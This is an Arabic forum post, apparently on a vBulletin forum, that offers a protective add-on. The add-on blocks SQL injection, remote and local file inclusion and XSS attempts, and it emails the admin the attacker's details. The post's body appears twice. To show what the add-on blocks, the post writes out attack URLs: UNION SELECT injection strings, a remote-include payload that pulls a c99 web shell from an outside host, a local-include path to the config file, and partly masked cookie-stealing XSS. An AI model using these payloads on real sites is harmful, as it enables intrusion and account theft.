السلام عليكم ورحمة الله وبركاته
هذا هاك من برمجتي لحماية المنتدى ومنع تطبيق انواع الثغرات وبشكل محدد تطبيق اكواد الثغرات من انواع SQL , RFI , LFI , Xss واكواد التحويل ومنع تلغيم المنتدى باكواد ثغرات في ملفات ال faq.php وال calendar.php وال showgroups.php
والمميز في الهاك انه فيو خاصية التبليغ على البريد مباشرة في حال حدث اي محاولة اختراق راح تصلك رساله وفيها ايبي الي حاول يخترق و استثمار الثغرة والتاريخ والوقت ,
اولا لا اسمح لاي شخص كان بانه يقوم بتغير الحقوق في البرمجة , ولا حتى حرف واحد
ثانية مثال على الهاك مباشرة .
أ . منع تطبيق ثغرات ال Remote SQL Injection ( ثغرات الحقن )
http://xxx.com/vb/index.php?id...union select
http:///xxx.com/vb/index.php?id=-1+union+select
http://xxx.com/vb/index.php?id...nion/**/select
ب . منع تطبيق ثغرات ال Remote File Include ( ثغرات الاحتواء والتضمين )
http://xxx.com/vb/misc.php?do=page&template={${include('http://casavie.net/hack/c99.txt')}}{${exit()}
كود:
http://xxx.com/vb/misc.php?do=page&template={${include('http://casavie.net/hack/c99.txt')}}{${exit()}}&ج . منع تطبيق ثغرات ال Remote Local File Include ( ثغرات الاحتواء والتضمين الداخلي )
http://xxx.com/vb/faq.php?faq=...des/config.php
د . منع ثغرات ال Cross Site $cripting ( ثغرات سحب كوكيز المدير و الاعضاء وسرقة عضوياتهم )
http://xxx.com/vb/faq.php?faq=...)</******>
كود:
http://xxx.com/vb/faq.php?faq=*****(document.******)منع اي كود تحويل كان وفي حال تواجد الاحصائيات والاهدائات واخر عشر مواضيع , تم حل مشكلتهم قطعيا قطعيا ,
الان نجي لخطوة تعديل ال البريد :
اول ما تحمل الهاك وتفك الضغط عنه , قوم بفتحه بالمفكرة او الدفتر او اي محرر php ,
قم بالبحث عن alqooods@alqooods.com , واستبدله بالبريد الي بتريد يوصلك عليه تبليغ محاولة الاختراق ,
هذا هاك من برمجتي لحماية المنتدى ومنع تطبيق انواع الثغرات وبشكل محدد تطبيق اكواد الثغرات من انواع SQL , RFI , LFI , Xss واكواد التحويل ومنع تلغيم المنتدى باكواد ثغرات في ملفات ال faq.php وال calendar.php وال showgroups.php
والمميز في الهاك انه فيو خاصية التبليغ على البريد مباشرة في حال حدث اي محاولة اختراق راح تصلك رساله وفيها ايبي الي حاول يخترق و استثمار الثغرة والتاريخ والوقت ,
اولا لا اسمح لاي شخص كان بانه يقوم بتغير الحقوق في البرمجة , ولا حتى حرف واحد
ثانية مثال على الهاك مباشرة .
أ . منع تطبيق ثغرات ال Remote SQL Injection ( ثغرات الحقن )
http://xxx.com/vb/index.php?id...union select
http:///xxx.com/vb/index.php?id=-1+union+select
http://xxx.com/vb/index.php?id...nion/**/select
ب . منع تطبيق ثغرات ال Remote File Include ( ثغرات الاحتواء والتضمين )
http://xxx.com/vb/misc.php?do=page&template={${include('http://casavie.net/hack/c99.txt')}}{${exit()}
كود:
http://xxx.com/vb/misc.php?do=page&template={${include('http://casavie.net/hack/c99.txt')}}{${exit()}}&ج . منع تطبيق ثغرات ال Remote Local File Include ( ثغرات الاحتواء والتضمين الداخلي )
http://xxx.com/vb/faq.php?faq=...des/config.php
د . منع ثغرات ال Cross Site $cripting ( ثغرات سحب كوكيز المدير و الاعضاء وسرقة عضوياتهم )
http://xxx.com/vb/faq.php?faq=...)</******>
كود:
http://xxx.com/vb/faq.php?faq=*****(document.******)منع اي كود تحويل كان وفي حال تواجد الاحصائيات والاهدائات واخر عشر مواضيع , تم حل مشكلتهم قطعيا قطعيا ,
الان نجي لخطوة تعديل ال البريد :
اول ما تحمل الهاك وتفك الضغط عنه , قوم بفتحه بالمفكرة او الدفتر او اي محرر php ,
قم بالبحث عن alqooods@alqooods.com , واستبدله بالبريد الي بتريد يوصلك عليه تبليغ محاولة الاختراق ,
الملفات المرفقة
